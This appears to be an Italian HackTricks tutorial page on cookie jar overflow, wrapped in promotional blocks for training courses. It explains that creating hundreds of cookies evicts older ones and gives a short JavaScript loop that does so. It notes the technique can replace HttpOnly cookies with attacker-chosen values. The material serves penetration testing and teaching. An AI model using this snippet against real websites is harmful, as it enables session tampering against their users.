HackTricks
Tip
Impara e pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord, al gruppo telegram, segui @hacktricks_live su X/Twitter, oppure controlla la pagina LinkedIn e il canale YouTube.
- Condividi hacking tricks inviando PR ai repository github HackTricks e HackTricks Cloud.
I browser hanno un limite sul numero di cookie che possono memorizzare per una pagina. Quindi, se per qualche motivo hai bisogno di far scomparire un cookie, puoi sovraccaricare il barattolo dei cookie poiché i più vecchi verranno eliminati per primi:
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
Nota che i cookie di terze parti che puntano a un dominio diverso non verranno sovrascritti.
Caution
Questo attacco può essere utilizzato anche per sovrascrivere i cookie HttpOnly poiché puoi eliminarli e poi reimpostarli con il valore che desideri.
Controlla questo in questo post con un laboratorio.
Tip
Impara e pratica AWS Hacking:
Impara e pratica GCP Hacking:
Impara e pratica Az Hacking:Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord, al gruppo telegram, segui @hacktricks_live su X/Twitter, oppure controlla la pagina LinkedIn e il canale YouTube.
- Condividi hacking tricks inviando PR ai repository github HackTricks e HackTricks Cloud.